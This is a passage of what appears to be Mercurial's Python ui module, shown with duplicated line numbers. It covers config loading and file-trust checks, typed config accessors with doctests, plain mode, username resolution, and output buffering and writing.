394 394 _(b"press ^C again to terminate immediately (dangerous)\n")
395 395 )
396 396 return True
397 397
398 398 with procutil.uninterruptible(warn):
399 399 try:
400 400 self._uninterruptible = True
401 401 yield
402 402 finally:
403 403 self._uninterruptible = False
404 404
405 405 def formatter(self, topic, opts):
406 406 return formatter.formatter(self, self, topic, opts)
407 407
408 408 def _trusted(self, fp, f):
409 409 st = util.fstat(fp)
410 410 if util.isowner(st):
411 411 return True
412 412
413 413 tusers, tgroups = self._trustusers, self._trustgroups
414 414 if b'*' in tusers or b'*' in tgroups:
415 415 return True
416 416
417 417 user = util.username(st.st_uid)
418 418 group = util.groupname(st.st_gid)
419 419 if user in tusers or group in tgroups or user == util.username():
420 420 return True
421 421
422 422 if self._reportuntrusted:
423 423 self.warn(
424 424 _(
425 425 b'not trusting file %s from untrusted '
426 426 b'user %s, group %s\n'
427 427 )
428 428 % (f, user, group)
429 429 )
430 430 return False
431 431
432 432 def read_resource_config(
433 433 self, name, root=None, trust=False, sections=None, remap=None
434 434 ):
435 435 try:
436 436 fp = resourceutil.open_resource(name[0], name[1])
437 437 except IOError:
438 438 if not sections: # ignore unless we were looking for something
439 439 return
440 440 raise
441 441
442 442 self._readconfig(
443 443 b'resource:%s.%s' % name, fp, root, trust, sections, remap
444 444 )
445 445
446 446 def readconfig(
447 447 self, filename, root=None, trust=False, sections=None, remap=None
448 448 ):
449 449 try:
450 450 fp = open(filename, 'rb')
451 451 except IOError:
452 452 if not sections: # ignore unless we were looking for something
453 453 return
454 454 raise
455 455
456 456 self._readconfig(filename, fp, root, trust, sections, remap)
457 457
458 458 def _readconfig(
459 459 self, filename, fp, root=None, trust=False, sections=None, remap=None
460 460 ):
461 461 with fp:
462 462 cfg = config.config()
463 463 trusted = sections or trust or self._trusted(fp, filename)
464 464
465 465 try:
466 466 cfg.read(filename, fp, sections=sections, remap=remap)
467 467 except error.ParseError as inst:
468 468 if trusted:
469 469 raise
470 470 self.warn(_(b'ignored: %s\n') % stringutil.forcebytestr(inst))
471 471
472 472 self._applyconfig(cfg, trusted, root)
473 473
474 474 def applyconfig(self, configitems, source=b"", root=None):
475 475 """Add configitems from a non-file source. Unlike with ``setconfig()``,
476 476 they can be overridden by subsequent config file reads. The items are
477 477 in the same format as ``configoverride()``, namely a dict of the
478 478 following structures: {(section, name) : value}
479 479
480 480 Typically this is used by extensions that inject themselves into the
481 481 config file load procedure by monkeypatching ``localrepo.loadhgrc()``.
482 482 """
483 483 cfg = config.config()
484 484
485 485 for (section, name), value in configitems.items():
486 486 cfg.set(section, name, value, source)
487 487
488 488 self._applyconfig(cfg, True, root)
489 489
490 490 def _applyconfig(self, cfg, trusted, root):
491 491 if self.plain():
492 492 for k in (
493 493 b'debug',
494 494 b'fallbackencoding',
495 495 b'quiet',
496 496 b'slash',
497 497 b'logtemplate',
498 498 b'message-output',
499 499 b'statuscopies',
500 500 b'style',
501 501 b'traceback',
502 502 b'verbose',
503 503 ):
504 504 if k in cfg[b'ui']:
505 505 del cfg[b'ui'][k]
506 506 for k, v in cfg.items(b'defaults'):
507 507 del cfg[b'defaults'][k]
508 508 for k, v in cfg.items(b'commands'):
509 509 del cfg[b'commands'][k]
510 510 # Don't remove aliases from the configuration if in the exceptionlist
511 511 if self.plain(b'alias'):
512 512 for k, v in cfg.items(b'alias'):
513 513 del cfg[b'alias'][k]
514 514 if self.plain(b'revsetalias'):
515 515 for k, v in cfg.items(b'revsetalias'):
516 516 del cfg[b'revsetalias'][k]
517 517 if self.plain(b'templatealias'):
518 518 for k, v in cfg.items(b'templatealias'):
519 519 del cfg[b'templatealias'][k]
520 520
521 521 if trusted:
522 522 self._tcfg.update(cfg)
523 523 self._tcfg.update(self._ocfg)
524 524 self._ucfg.update(cfg)
525 525 self._ucfg.update(self._ocfg)
526 526
527 527 if root is None:
528 528 root = os.path.expanduser(b'~')
529 529 self.fixconfig(root=root)
530 530
531 531 def fixconfig(self, root=None, section=None):
532 532 if section in (None, b'paths'):
533 533 # expand vars and ~
534 534 # translate paths relative to root (or home) into absolute paths
535 535 root = root or encoding.getcwd()
536 536 for c in self._tcfg, self._ucfg, self._ocfg:
537 537 for n, p in c.items(b'paths'):
538 538 # Ignore sub-options.
539 539 if b':' in n:
540 540 continue
541 541 if not p:
542 542 continue
543 543 if b'%%' in p:
544 544 s = self.configsource(b'paths', n) or b'none'
545 545 self.warn(
546 546 _(b"(deprecated '%%' in path %s=%s from %s)\n")
547 547 % (n, p, s)
548 548 )
549 549 p = p.replace(b'%%', b'%')
550 550 p = util.expandpath(p)
551 551 if not util.hasscheme(p) and not os.path.isabs(p):
552 552 p = os.path.normpath(os.path.join(root, p))
553 553 c.set(b"paths", n, p)
554 554
555 555 if section in (None, b'ui'):
556 556 # update ui options
557 557 self._fmsgout, self._fmsgerr = _selectmsgdests(self)
558 558 self.debugflag = self.configbool(b'ui', b'debug')
559 559 self.verbose = self.debugflag or self.configbool(b'ui', b'verbose')
560 560 self.quiet = not self.debugflag and self.configbool(b'ui', b'quiet')
561 561 if self.verbose and self.quiet:
562 562 self.quiet = self.verbose = False
563 563 self._reportuntrusted = self.debugflag or self.configbool(
564 564 b"ui", b"report_untrusted"
565 565 )
566 566 self.showtimestamp = self.configbool(b'ui', b'timestamp-output')
567 567 self.tracebackflag = self.configbool(b'ui', b'traceback')
568 568 self.logblockedtimes = self.configbool(b'ui', b'logblockedtimes')
569 569
570 570 if section in (None, b'trusted'):
571 571 # update trust information
572 572 self._trustusers.update(self.configlist(b'trusted', b'users'))
573 573 self._trustgroups.update(self.configlist(b'trusted', b'groups'))
574 574
575 575 if section in (None, b'devel', b'ui') and self.debugflag:
576 576 tracked = set()
577 577 if self.configbool(b'devel', b'debug.extensions'):
578 578 tracked.add(b'extension')
579 579 if tracked:
580 580 logger = loggingutil.fileobjectlogger(self._ferr, tracked)
581 581 self.setlogger(b'debug', logger)
582 582
583 583 def backupconfig(self, section, item):
584 584 return (
585 585 self._ocfg.backup(section, item),
586 586 self._tcfg.backup(section, item),
587 587 self._ucfg.backup(section, item),
588 588 )
589 589
590 590 def restoreconfig(self, data):
591 591 self._ocfg.restore(data[0])
592 592 self._tcfg.restore(data[1])
593 593 self._ucfg.restore(data[2])
594 594
595 595 def setconfig(self, section, name, value, source=b''):
596 596 for cfg in (self._ocfg, self._tcfg, self._ucfg):
597 597 cfg.set(section, name, value, source)
598 598 self.fixconfig(section=section)
599 599 self._maybetweakdefaults()
600 600
601 601 def _data(self, untrusted):
602 602 return untrusted and self._ucfg or self._tcfg
603 603
604 604 def configsource(self, section, name, untrusted=False):
605 605 return self._data(untrusted).source(section, name)
606 606
607 607 def config(self, section, name, default=_unset, untrusted=False):
608 608 """return the plain string version of a config"""
609 609 value = self._config(
610 610 section, name, default=default, untrusted=untrusted
611 611 )
612 612 if value is _unset:
613 613 return None
614 614 return value
615 615
616 616 def _config(self, section, name, default=_unset, untrusted=False):
617 617 value = itemdefault = default
618 618 item = self._knownconfig.get(section, {}).get(name)
619 619 alternates = [(section, name)]
620 620
621 621 if item is not None:
622 622 alternates.extend(item.alias)
623 623 if callable(item.default):
624 624 itemdefault = item.default()
625 625 else:
626 626 itemdefault = item.default
627 627 else:
628 628 msg = b"accessing unregistered config item: '%s.%s'"
629 629 msg %= (section, name)
630 630 self.develwarn(msg, 2, b'warn-config-unknown')
631 631
632 632 if default is _unset:
633 633 if item is None:
634 634 value = default
635 635 elif item.default is configitems.dynamicdefault:
636 636 value = None
637 637 msg = b"config item requires an explicit default value: '%s.%s'"
638 638 msg %= (section, name)
639 639 self.develwarn(msg, 2, b'warn-config-default')
640 640 else:
641 641 value = itemdefault
642 642 elif (
643 643 item is not None
644 644 and item.default is not configitems.dynamicdefault
645 645 and default != itemdefault
646 646 ):
647 647 msg = (
648 648 b"specifying a mismatched default value for a registered "
649 649 b"config item: '%s.%s' '%s'"
650 650 )
651 651 msg %= (section, name, pycompat.bytestr(default))
652 652 self.develwarn(msg, 2, b'warn-config-default')
653 653
654 654 for s, n in alternates:
655 655 candidate = self._data(untrusted).get(s, n, None)
656 656 if candidate is not None:
657 657 value = candidate
658 658 break
659 659
660 660 if self.debugflag and not untrusted and self._reportuntrusted:
661 661 for s, n in alternates:
662 662 uvalue = self._ucfg.get(s, n)
663 663 if uvalue is not None and uvalue != value:
664 664 self.debug(
665 665 b"ignoring untrusted configuration option "
666 666 b"%s.%s = %s\n" % (s, n, uvalue)
667 667 )
668 668 return value
669 669
670 670 def configsuboptions(self, section, name, default=_unset, untrusted=False):
671 671 """Get a config option and all sub-options.
672 672
673 673 Some config options have sub-options that are declared with the
674 674 format "key:opt = value". This method is used to return the main
675 675 option and all its declared sub-options.
676 676
677 677 Returns a 2-tuple of ``(option, sub-options)``, where `sub-options``
678 678 is a dict of defined sub-options where keys and values are strings.
679 679 """
680 680 main = self.config(section, name, default, untrusted=untrusted)
681 681 data = self._data(untrusted)
682 682 sub = {}
683 683 prefix = b'%s:' % name
684 684 for k, v in data.items(section):
685 685 if k.startswith(prefix):
686 686 sub[k[len(prefix) :]] = v
687 687
688 688 if self.debugflag and not untrusted and self._reportuntrusted:
689 689 for k, v in sub.items():
690 690 uvalue = self._ucfg.get(section, b'%s:%s' % (name, k))
691 691 if uvalue is not None and uvalue != v:
692 692 self.debug(
693 693 b'ignoring untrusted configuration option '
694 694 b'%s:%s.%s = %s\n' % (section, name, k, uvalue)
695 695 )
696 696
697 697 return main, sub
698 698
699 699 def configpath(self, section, name, default=_unset, untrusted=False):
700 700 """get a path config item, expanded relative to repo root or config
701 701 file"""
702 702 v = self.config(section, name, default, untrusted)
703 703 if v is None:
704 704 return None
705 705 if not os.path.isabs(v) or b"://" not in v:
706 706 src = self.configsource(section, name, untrusted)
707 707 if b':' in src:
708 708 base = os.path.dirname(src.rsplit(b':')[0])
709 709 v = os.path.join(base, os.path.expanduser(v))
710 710 return v
711 711
712 712 def configbool(self, section, name, default=_unset, untrusted=False):
713 713 """parse a configuration element as a boolean
714 714
715 715 >>> u = ui(); s = b'foo'
716 716 >>> u.setconfig(s, b'true', b'yes')
717 717 >>> u.configbool(s, b'true')
718 718 True
719 719 >>> u.setconfig(s, b'false', b'no')
720 720 >>> u.configbool(s, b'false')
721 721 False
722 722 >>> u.configbool(s, b'unknown')
723 723 False
724 724 >>> u.configbool(s, b'unknown', True)
725 725 True
726 726 >>> u.setconfig(s, b'invalid', b'somevalue')
727 727 >>> u.configbool(s, b'invalid')
728 728 Traceback (most recent call last):
729 729 ...
730 730 ConfigError: foo.invalid is not a boolean ('somevalue')
731 731 """
732 732
733 733 v = self._config(section, name, default, untrusted=untrusted)
734 734 if v is None:
735 735 return v
736 736 if v is _unset:
737 737 if default is _unset:
738 738 return False
739 739 return default
740 740 if isinstance(v, bool):
741 741 return v
742 742 b = stringutil.parsebool(v)
743 743 if b is None:
744 744 raise error.ConfigError(
745 745 _(b"%s.%s is not a boolean ('%s')") % (section, name, v)
746 746 )
747 747 return b
748 748
749 749 def configwith(
750 750 self, convert, section, name, default=_unset, desc=None, untrusted=False
751 751 ):
752 752 """parse a configuration element with a conversion function
753 753
754 754 >>> u = ui(); s = b'foo'
755 755 >>> u.setconfig(s, b'float1', b'42')
756 756 >>> u.configwith(float, s, b'float1')
757 757 42.0
758 758 >>> u.setconfig(s, b'float2', b'-4.25')
759 759 >>> u.configwith(float, s, b'float2')
760 760 -4.25
761 761 >>> u.configwith(float, s, b'unknown', 7)
762 762 7.0
763 763 >>> u.setconfig(s, b'invalid', b'somevalue')
764 764 >>> u.configwith(float, s, b'invalid')
765 765 Traceback (most recent call last):
766 766 ...
767 767 ConfigError: foo.invalid is not a valid float ('somevalue')
768 768 >>> u.configwith(float, s, b'invalid', desc=b'womble')
769 769 Traceback (most recent call last):
770 770 ...
771 771 ConfigError: foo.invalid is not a valid womble ('somevalue')
772 772 """
773 773
774 774 v = self.config(section, name, default, untrusted)
775 775 if v is None:
776 776 return v # do not attempt to convert None
777 777 try:
778 778 return convert(v)
779 779 except (ValueError, error.ParseError):
780 780 if desc is None:
781 781 desc = pycompat.sysbytes(convert.__name__)
782 782 raise error.ConfigError(
783 783 _(b"%s.%s is not a valid %s ('%s')") % (section, name, desc, v)
784 784 )
785 785
786 786 def configint(self, section, name, default=_unset, untrusted=False):
787 787 """parse a configuration element as an integer
788 788
789 789 >>> u = ui(); s = b'foo'
790 790 >>> u.setconfig(s, b'int1', b'42')
791 791 >>> u.configint(s, b'int1')
792 792 42
793 793 >>> u.setconfig(s, b'int2', b'-42')
794 794 >>> u.configint(s, b'int2')
795 795 -42
796 796 >>> u.configint(s, b'unknown', 7)
797 797 7
798 798 >>> u.setconfig(s, b'invalid', b'somevalue')
799 799 >>> u.configint(s, b'invalid')
800 800 Traceback (most recent call last):
801 801 ...
802 802 ConfigError: foo.invalid is not a valid integer ('somevalue')
803 803 """
804 804
805 805 return self.configwith(
806 806 int, section, name, default, b'integer', untrusted
807 807 )
808 808
809 809 def configbytes(self, section, name, default=_unset, untrusted=False):
810 810 """parse a configuration element as a quantity in bytes
811 811
812 812 Units can be specified as b (bytes), k or kb (kilobytes), m or
813 813 mb (megabytes), g or gb (gigabytes).
814 814
815 815 >>> u = ui(); s = b'foo'
816 816 >>> u.setconfig(s, b'val1', b'42')
817 817 >>> u.configbytes(s, b'val1')
818 818 42
819 819 >>> u.setconfig(s, b'val2', b'42.5 kb')
820 820 >>> u.configbytes(s, b'val2')
821 821 43520
822 822 >>> u.configbytes(s, b'unknown', b'7 MB')
823 823 7340032
824 824 >>> u.setconfig(s, b'invalid', b'somevalue')
825 825 >>> u.configbytes(s, b'invalid')
826 826 Traceback (most recent call last):
827 827 ...
828 828 ConfigError: foo.invalid is not a byte quantity ('somevalue')
829 829 """
830 830
831 831 value = self._config(section, name, default, untrusted)
832 832 if value is _unset:
833 833 if default is _unset:
834 834 default = 0
835 835 value = default
836 836 if not isinstance(value, bytes):
837 837 return value
838 838 try:
839 839 return util.sizetoint(value)
840 840 except error.ParseError:
841 841 raise error.ConfigError(
842 842 _(b"%s.%s is not a byte quantity ('%s')")
843 843 % (section, name, value)
844 844 )
845 845
846 846 def configlist(self, section, name, default=_unset, untrusted=False):
847 847 """parse a configuration element as a list of comma/space separated
848 848 strings
849 849
850 850 >>> u = ui(); s = b'foo'
851 851 >>> u.setconfig(s, b'list1', b'this,is "a small" ,test')
852 852 >>> u.configlist(s, b'list1')
853 853 ['this', 'is', 'a small', 'test']
854 854 >>> u.setconfig(s, b'list2', b'this, is "a small" , test ')
855 855 >>> u.configlist(s, b'list2')
856 856 ['this', 'is', 'a small', 'test']
857 857 """
858 858 # default is not always a list
859 859 v = self.configwith(
860 860 config.parselist, section, name, default, b'list', untrusted
861 861 )
862 862 if isinstance(v, bytes):
863 863 return config.parselist(v)
864 864 elif v is None:
865 865 return []
866 866 return v
867 867
868 868 def configdate(self, section, name, default=_unset, untrusted=False):
869 869 """parse a configuration element as a tuple of ints
870 870
871 871 >>> u = ui(); s = b'foo'
872 872 >>> u.setconfig(s, b'date', b'0 0')
873 873 >>> u.configdate(s, b'date')
874 874 (0, 0)
875 875 """
876 876 if self.config(section, name, default, untrusted):
877 877 return self.configwith(
878 878 dateutil.parsedate, section, name, default, b'date', untrusted
879 879 )
880 880 if default is _unset:
881 881 return None
882 882 return default
883 883
884 884 def configdefault(self, section, name):
885 885 """returns the default value of the config item"""
886 886 item = self._knownconfig.get(section, {}).get(name)
887 887 itemdefault = None
888 888 if item is not None:
889 889 if callable(item.default):
890 890 itemdefault = item.default()
891 891 else:
892 892 itemdefault = item.default
893 893 return itemdefault
894 894
895 895 def hasconfig(self, section, name, untrusted=False):
896 896 return self._data(untrusted).hasitem(section, name)
897 897
898 898 def has_section(self, section, untrusted=False):
899 899 '''tell whether section exists in config.'''
900 900 return section in self._data(untrusted)
901 901
902 902 def configitems(self, section, untrusted=False, ignoresub=False):
903 903 items = self._data(untrusted).items(section)
904 904 if ignoresub:
905 905 items = [i for i in items if b':' not in i[0]]
906 906 if self.debugflag and not untrusted and self._reportuntrusted:
907 907 for k, v in self._ucfg.items(section):
908 908 if self._tcfg.get(section, k) != v:
909 909 self.debug(
910 910 b"ignoring untrusted configuration option "
911 911 b"%s.%s = %s\n" % (section, k, v)
912 912 )
913 913 return items
914 914
915 915 def walkconfig(self, untrusted=False):
916 916 cfg = self._data(untrusted)
917 917 for section in cfg.sections():
918 918 for name, value in self.configitems(section, untrusted):
919 919 yield section, name, value
920 920
921 921 def plain(self, feature=None):
922 922 '''is plain mode active?
923 923
924 924 Plain mode means that all configuration variables which affect
925 925 the behavior and output of Mercurial should be
926 926 ignored. Additionally, the output should be stable,
927 927 reproducible and suitable for use in scripts or applications.
928 928
929 929 The only way to trigger plain mode is by setting either the
930 930 `HGPLAIN' or `HGPLAINEXCEPT' environment variables.
931 931
932 932 The return value can either be
933 933 - False if HGPLAIN is not set, or feature is in HGPLAINEXCEPT
934 934 - False if feature is disabled by default and not included in HGPLAIN
935 935 - True otherwise
936 936 '''
937 937 if (
938 938 b'HGPLAIN' not in encoding.environ
939 939 and b'HGPLAINEXCEPT' not in encoding.environ
940 940 ):
941 941 return False
942 942 exceptions = (
943 943 encoding.environ.get(b'HGPLAINEXCEPT', b'').strip().split(b',')
944 944 )
945 945 # TODO: add support for HGPLAIN=+feature,-feature syntax
946 946 if b'+strictflags' not in encoding.environ.get(b'HGPLAIN', b'').split(
947 947 b','
948 948 ):
949 949 exceptions.append(b'strictflags')
950 950 if feature and exceptions:
951 951 return feature not in exceptions
952 952 return True
953 953
954 954 def username(self, acceptempty=False):
955 955 """Return default username to be used in commits.
956 956
957 957 Searched in this order: $HGUSER, [ui] section of hgrcs, $EMAIL
958 958 and stop searching if one of these is set.
959 959 If not found and acceptempty is True, returns None.
960 960 If not found and ui.askusername is True, ask the user, else use
961 961 ($LOGNAME or $USER or $LNAME or $USERNAME) + "@full.hostname".
962 962 If no username could be found, raise an Abort error.
963 963 """
964 964 user = encoding.environ.get(b"HGUSER")
965 965 if user is None:
966 966 user = self.config(b"ui", b"username")
967 967 if user is not None:
968 968 user = os.path.expandvars(user)
969 969 if user is None:
970 970 user = encoding.environ.get(b"EMAIL")
971 971 if user is None and acceptempty:
972 972 return user
973 973 if user is None and self.configbool(b"ui", b"askusername"):
974 974 user = self.prompt(_(b"enter a commit username:"), default=None)
975 975 if user is None and not self.interactive():
976 976 try:
977 977 user = b'%s@%s' % (
978 978 procutil.getuser(),
979 979 encoding.strtolocal(socket.getfqdn()),
980 980 )
981 981 self.warn(_(b"no username found, using '%s' instead\n") % user)
982 982 except KeyError:
983 983 pass
984 984 if not user:
985 985 raise error.Abort(
986 986 _(b'no username supplied'),
987 987 hint=_(b"use 'hg config --edit' " b'to set your username'),
988 988 )
989 989 if b"\n" in user:
990 990 raise error.Abort(
991 991 _(b"username %r contains a newline\n") % pycompat.bytestr(user)
992 992 )
993 993 return user
994 994
995 995 def shortuser(self, user):
996 996 """Return a short representation of a user name or email address."""
997 997 if not self.verbose:
998 998 user = stringutil.shortuser(user)
999 999 return user
1000 1000
1001 1001 def expandpath(self, loc, default=None):
1002 1002 """Return repository location relative to cwd or from [paths]"""
1003 1003 try:
1004 1004 p = self.paths.getpath(loc)
1005 1005 if p:
1006 1006 return p.rawloc
1007 1007 except error.RepoError:
1008 1008 pass
1009 1009
1010 1010 if default:
1011 1011 try:
1012 1012 p = self.paths.getpath(default)
1013 1013 if p:
1014 1014 return p.rawloc
1015 1015 except error.RepoError:
1016 1016 pass
1017 1017
1018 1018 return loc
1019 1019
1020 1020 @util.propertycache
1021 1021 def paths(self):
1022 1022 return paths(self)
1023 1023
1024 1024 @property
1025 1025 def fout(self):
1026 1026 return self._fout
1027 1027
1028 1028 @fout.setter
1029 1029 def fout(self, f):
1030 1030 self._fout = f
1031 1031 self._fmsgout, self._fmsgerr = _selectmsgdests(self)
1032 1032
1033 1033 @property
1034 1034 def ferr(self):
1035 1035 return self._ferr
1036 1036
1037 1037 @ferr.setter
1038 1038 def ferr(self, f):
1039 1039 self._ferr = f
1040 1040 self._fmsgout, self._fmsgerr = _selectmsgdests(self)
1041 1041
1042 1042 @property
1043 1043 def fin(self):
1044 1044 return self._fin
1045 1045
1046 1046 @fin.setter
1047 1047 def fin(self, f):
1048 1048 self._fin = f
1049 1049
1050 1050 @property
1051 1051 def fmsg(self):
1052 1052 """Stream dedicated for status/error messages; may be None if
1053 1053 fout/ferr are used"""
1054 1054 return self._fmsg
1055 1055
1056 1056 @fmsg.setter
1057 1057 def fmsg(self, f):
1058 1058 self._fmsg = f
1059 1059 self._fmsgout, self._fmsgerr = _selectmsgdests(self)
1060 1060
1061 1061 def pushbuffer(self, error=False, subproc=False, labeled=False):
1062 1062 """install a buffer to capture standard output of the ui object
1063 1063
1064 1064 If error is True, the error output will be captured too.
1065 1065
1066 1066 If subproc is True, output from subprocesses (typically hooks) will be
1067 1067 captured too.
1068 1068
1069 1069 If labeled is True, any labels associated with buffered
1070 1070 output will be handled. By default, this has no effect
1071 1071 on the output returned, but extensions and GUI tools may
1072 1072 handle this argument and returned styled output. If output
1073 1073 is being buffered so it can be captured and parsed or
1074 1074 processed, labeled should not be set to True.
1075 1075 """
1076 1076 self._buffers.append([])
1077 1077 self._bufferstates.append((error, subproc, labeled))
1078 1078 self._bufferapplylabels = labeled
1079 1079
1080 1080 def popbuffer(self):
1081 1081 '''pop the last buffer and return the buffered output'''
1082 1082 self._bufferstates.pop()
1083 1083 if self._bufferstates:
1084 1084 self._bufferapplylabels = self._bufferstates[-1][2]
1085 1085 else:
1086 1086 self._bufferapplylabels = None
1087 1087
1088 1088 return b"".join(self._buffers.pop())
1089 1089
1090 1090 def _isbuffered(self, dest):
1091 1091 if dest is self._fout:
1092 1092 return bool(self._buffers)
1093 1093 if dest is self._ferr:
1094 1094 return bool(self._bufferstates and self._bufferstates[-1][0])
1095 1095 return False
1096 1096
1097 1097 def canwritewithoutlabels(self):
1098 1098 '''check if write skips the label'''
1099 1099 if self._buffers and not self._bufferapplylabels:
1100 1100 return True
1101 1101 return self._colormode is None
1102 1102
1103 1103 def canbatchlabeledwrites(self):
1104 1104 '''check if write calls with labels are batchable'''
1105 1105 # Windows color printing is special, see ``write``.
1106 1106 return self._colormode != b'win32'
1107 1107
1108 1108 def write(self, *args, **opts):
1109 1109 '''write args to output
1110 1110
1111 1111 By default, this method simply writes to the buffer or stdout.
1112 1112 Color mode can be set on the UI class to have the output decorated
1113 1113 with color modifier before being written to stdout.
1114 1114
1115 1115 The color used is controlled by an optional keyword argument, "label".
1116 1116 This should be a string containing label names separated by space.
1117 1117 Label names take the form of "topic.type". For example, ui.debug()
1118 1118 issues a label of "ui.debug".
1119 1119
1120 1120 Progress reports via stderr are normally cleared before writing as
1121 1121 stdout and stderr go to the same terminal. This can be skipped with
1122 1122 the optional keyword argument "keepprogressbar". The progress bar
1123 1123 will continue to occupy a partial line on stderr in that case.
1124 1124 This functionality is intended when Mercurial acts as data source
1125 1125 in a pipe.
1126 1126
1127 1127 When labeling output for a specific command, a label of
1128 1128 "cmdname.type" is recommended. For example, status issues
1129 1129 a label of "status.modified" for modified files.
1130 1130 '''
1131 1131 dest = self._fout
1132 1132
1133 1133 # inlined _write() for speed
1134 1134 if self._buffers:
1135 1135 label = opts.get('label', b'')
1136 1136 if label and self._bufferapplylabels:
1137 1137 self._buffers[-1].extend(self.label(a, label) for a in args)
1138 1138 else:
1139 1139 self._buffers[-1].extend(args)
1140 1140 return
1141 1141
1142 1142 # inlined _writenobuf() for speed
1143 1143 if not opts.get('keepprogressbar', False):
1144 1144 self._progclear()
1145 1145 msg = b''.join(args)
1146 1146
1147 1147 # opencode timeblockedsection because this is a critical path
1148 1148 starttime = util.timer()
1149 1149 try:
1150 1150 if self._colormode == b'win32':
1151 1151 # windows color printing is its own can of crab, defer to
1152 1152 # the color module and that is it.
1153 1153 color.win32print(self, dest.write, msg, **opts)
1154 1154 else:
1155 1155 if self._colormode is not None:
1156 1156 label = opts.get('label', b'')
1157 1157 msg = self.label(msg, label)
1158 1158 dest.write(msg)
1159 1159 except IOError as err:
1160 1160 raise error.StdioError(err)
1161 1161 finally:
1162 1162 self._blockedtimes[b'stdio_blocked'] += (
1163 1163 util.timer() - starttime
1164 1164 ) * 1000
1165 1165
1166 1166 def write_err(self, *args, **opts):
1167 1167 self._write(self._ferr, *args, **opts)
1168 1168
1169 1169 def _write(self, dest, *args, **opts):
1170 1170 # update write() as well if you touch this code
1171 1171 if self._isbuffered(dest):
1172 1172 label = opts.get('label', b'')
1173 1173 if label and self._bufferapplylabels:
1174 1174 self._buffers[-1].extend(self.label(a, label) for a in args)
1175 1175 else:
1176 1176 self._buffers[-1].extend(args)
1177 1177 else:
1178 1178 self._writenobuf(dest, *args, **opts)
1179 1179
1180 1180 def _writenobuf(self, dest, *args, **opts):
1181 1181 # update write() as well if you touch this code
1182 1182 if not opts.get('keepprogressbar', False):
1183 1183 self._progclear()
1184 1184 msg = b''.join(args)
1185 1185
1186 1186 # opencode timeblockedsection because this is a critical path
1187 1187 starttime = util.timer()
1188 1188 try:
1189 1189 if dest is self._ferr and not getattr(self._fout, 'closed', False):
1190 1190 self._fout.flush()
1191 1191 if getattr(dest, 'structured', False):
1192 1192 # channel for machine-readable output with metadata, where
1193 1193 # no extra colorization is necessary.
1194 1194 dest.write(msg, **opts)
1195 1195 elif self._colormode == b'win32':
1196 1196 # windows color printing is its own can of crab, defer to
1197 1197 # the color module and that is it.
1198 1198 color.win32print(self, dest.write, msg, **opts)
1199 1199 else:
1200 1200 if self._colormode is not None:
1201 1201 label = opts.get('label', b'')
1202 1202 msg = self.label(msg, label)
1203 1203 dest.write(msg)
1204 1204 # stderr may be buffered under win32 when redirected to files,
1205 1205 # including stdout.
1206 1206 if dest is self._ferr and not getattr(dest, 'closed', False):
1207 1207 dest.flush()
1208 1208 except IOError as err:
1209 1209 if dest is self._ferr and err.errno in (
1210 1210 errno.EPIPE,
1211 1211 errno.EIO,
1212 1212 errno.EBADF,
1213 1213 ):
1214 1214 # no way to report the error, so ignore it
1215 1215 return
1216 1216 raise error.StdioError(err)
1217 1217 finally:
1218 1218 self._blockedtimes[b'stdio_blocked'] += (
1219 1219 util.timer() - starttime
1220 1220 ) * 1000
1221 1221
1222 1222 def _writemsg(self, dest, *args, **opts):
1223 1223 timestamp = self.showtimestamp and opts.get('type') in {
1224 1224 b'debug',
1225 1225 b'error',
1226 1226 b'note',
1227 1227 b'status',
1228 1228 b'warning',
1229 1229 }
1230 1230 if timestamp:
1231 1231 args = (
1232 1232 b'[%s] '
1233 1233 % pycompat.bytestr(datetime.datetime.now().isoformat()),
1234 1234 ) + args
1235 1235 _writemsgwith(self._write, dest, *args, **opts)
1236 1236 if timestamp:
1237 1237 dest.flush()
1238 1238
1239 1239 def _writemsgnobuf(self, dest, *args, **opts):
1240 1240 _writemsgwith(self._writenobuf, dest, *args, **opts)
1241 1241
1242 1242 def flush(self):
1243 1243 # opencode timeblockedsection because this is a critical path
1244 1244 starttime = util.timer()
1245 1245 try:
1246 1246 try:
1247 1247 self._fout.flush()
1248 1248 except IOError as err:
1249 1249 if err.errno not in (errno.EPIPE, errno.EIO, errno.EBADF):
1250 1250 raise error.StdioError(err)
1251 1251 finally:
1252 1252 try:
1253 1253 self._ferr.flush()
1254 1254 except IOError as err:
1255 1255 if err.errno not in (errno.EPIPE, errno.EIO, errno.EBADF):
1256 1256 raise error.StdioError(err)
1257 1257 finally:
1258 1258 self._blockedtimes[b'stdio_blocked'] += (
1259 1259 util.timer() - starttime
1260 1260 ) * 1000
1261 1261
1262 1262 def _isatty(self, fh):
1263 1263 if self.configbool(b'ui', b'nontty'):
1264 1264 return False
1265 1265 return procutil.isatty(fh)
1266 1266
1267 1267 def protectfinout(self):
1268 1268 """Duplicate ui streams and redirect original if they are stdio
1269 1269
1270 1270 Returns (fin, fout) which point to the original ui fds, but may be
1271 1271 copy of them. The returned streams can be considered "owned" in that
1272 1272 print(), exec(), etc. never reach to them.
1273 1273 """
1274 1274 if self._finoutredirected:
1275 1275 # if already redirected, protectstdio() would just create another
1276 1276 # nullfd pair, which is equivalent to returning self._fin/_fout.
1277 1277 return self._fin, self._fout
1278 1278 fin, fout = procutil.protectstdio(self._fin, self._fout)
1279 1279 self._finoutredirected = (fin, fout) != (self._fin, self._fout)
1280 1280 return fin, fout
1281 1281
1282 1282 def restorefinout(self, fin, fout):
1283 1283 """Restore ui streams from possibly duplicated (fin, fout)"""
1284 1284 if (fin, fout) == (self._fin, self._fout):
1285 1285 return
1286 1286 procutil.restorestdio(self._fin, self._fout, fin, fout)
1287 1287 # protectfinout() won't create more than one duplicated streams,
1288 1288 # so we can just turn the redirection flag off.
1289 1289 self._finoutredirected = False
1290 1290
1291 1291 @contextlib.contextmanager
1292 1292 def protectedfinout(self):
1293 1293 """Run code block with protected standard streams"""
1294 1294 fin, fout = self.protectfinout()
1295 1295 try:
1296 1296 yield fin, fout
1297 1297 finally:
1298 1298 self.restorefinout(fin, fout)
1299 1299
1300 1300 def disablepager(self):
1301 1301 self._disablepager = True
1302 1302
1303 1303 def pager(self, command):
1304 1304 """Start a pager for subsequent command output.
1305 1305
1306 1306 Commands which produce a long stream of output should call
1307 1307 this function to activate the user's preferred pagination
1308 1308 mechanism (which may be no pager). Calling this function
1309 1309 precludes any future use of interactive functionality, such as
1310 1310 prompting the user or activating curses.
1311 1311
1312 1312 Args:
1313 1313 command: The full, non-aliased name of the command. That is, "log"
1314 1314 not "history, "summary" not "summ", etc.
1315 1315 """
1316 1316 if self._disablepager or self.pageractive:
1317 1317 # how pager should do is already determined
1318 1318 return
1319 1319
